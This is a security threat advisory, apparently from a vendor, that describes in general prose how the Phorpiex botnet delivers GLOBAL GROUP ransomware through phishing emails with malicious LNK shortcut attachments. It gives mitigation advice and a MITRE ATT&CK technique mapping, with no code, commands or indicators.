Threat Advisory Phorpiex Phishing Delivers Low-Noise Global Group Ransomware Threat: Phishing Campaign Targeted Region: Global Targeted Sector: Technology & IT Criticality: High EXECUTIVE SUMMARY: A large-scale phishing campaign leveraging the Phorpiex botnet to distribute GLOBAL GROUP ransomware. Phorpiex, historically known for spam propagation, sextortion, and malware delivery, continues to evolve as a flexible criminal distribution platform. In this activity, attackers relied on phishing emails containing malicious Windows shortcut (LNK) attachments crafted to resemble legitimate documents. The emails used social engineering lures to persuade recipients to open the attachment, initiating a concealed execution chain. This campaign illustrates how threat actors combine established malware infrastructure with ransomware payloads to amplify operational reach and financial impact. Rather than exploiting software vulnerabilities, the attackers primarily targeted human behavior, highlighting the enduring effectiveness of email-based deception. The abuse of LNK files enabled the delivery mechanism to appear benign while embedding hidden commands. The operation reflects a broader trend in which botnets function as initial access facilitators for ransomware operators. Overall, the incident demonstrates the convergence of phishing, modular malware staging, and ransomware monetization techniques. The infection sequence begins with a phishing email carrying a weaponized LNK attachment. When executed, the shortcut triggers obfuscated commands that initiate a multi-stage download routine. Instead of immediately deploying ransomware, the LNK file launches scripts that retrieve additional payloads from attacker-controlled infrastructure. These payloads include components associated with Phorpiex, which establish persistence and enable follow-on actions such as system profiling, potential credential access, or further malware distribution. The staged architecture improves evasion by separating the initial execution from the final ransomware payload. Heavily obfuscated PowerShell and command-line instructions conceal malicious intent and complicate detection. In later phases, GLOBAL GROUP ransomware is delivered and executed, encrypting files and presenting a ransom demand. The attackers rely extensively on legitimate system utilities, applying “living-off-the-land” techniques to reduce forensic visibility. Additionally, Phorpiex’s botnet functionality supports high-volume email dissemination, allowing the campaign to scale efficiently. The combination of phishing, script-based loaders, and ransomware demonstrates a stealth-oriented, modular attack framework. This campaign reinforces the continued effectiveness of phishing as a dominant initial access vector, even against organizations with established security controls. By exploiting user interaction through deceptive LNK attachments, attackers bypass perimeter defenses and initiate sophisticated, multi-stage malware chains. The integration of a long-standing botnet with ransomware highlights the increasing collaboration and specialization within the cybercriminal ecosystem. The use of obfuscated scripts and legitimate administrative tools demonstrates a clear emphasis on stealth, persistence, and defense evasion. To mitigate similar threats, organizations should adopt layered protections including advanced email filtering, behavioral monitoring, script control policies, and endpoint detection and response capabilities. Restricting LNK execution, auditing PowerShell activity, and strengthening user awareness programs can significantly reduce compromise risk. The incident underscores that legacy malware families remain highly dangerous when adapted to modern ransomware operations. Ultimately, the activity serves as a reminder that social engineering combined with modular malware delivery continues to pose a critical security challenge. THREAT PROFILE: Tactic Technique ID Technique Sub-Technique Reconnaissance T1598 Phishing for Information — Resources Development T1587 Develop Capabilities — Initial Access T1566.001 Phishing Spearphishing Attachment Execution T1204.002 User Execution Malicious File T1059.001 Command and Scripting Interpreter PowerShell Persistence T1547.001 Boot or Logon Autostart Execution Registry Run Keys / Startup Folder Privileged Escalation T1068 Exploitation for Privilege Escalation — Defence Evasion T1027 Obfuscated Files or Information — T1218 System Binary Proxy Execution — Credential Access T1555 Credentials from Password Stores — Discovery T1082 System Information Discovery — T1016 System Network Configuration Discovery — Lateral Movement T1021 Remote Services — Collection T1005 Data from Local System — Command and Control T1071 Application Layer Protocol — T1105 Ingress Tool Transfer — Exfiltration T1041 Exfiltration Over C2 Channel — Impact T1486 Data Encrypted for Impact — REFERENCES: The following reports contain further technical details: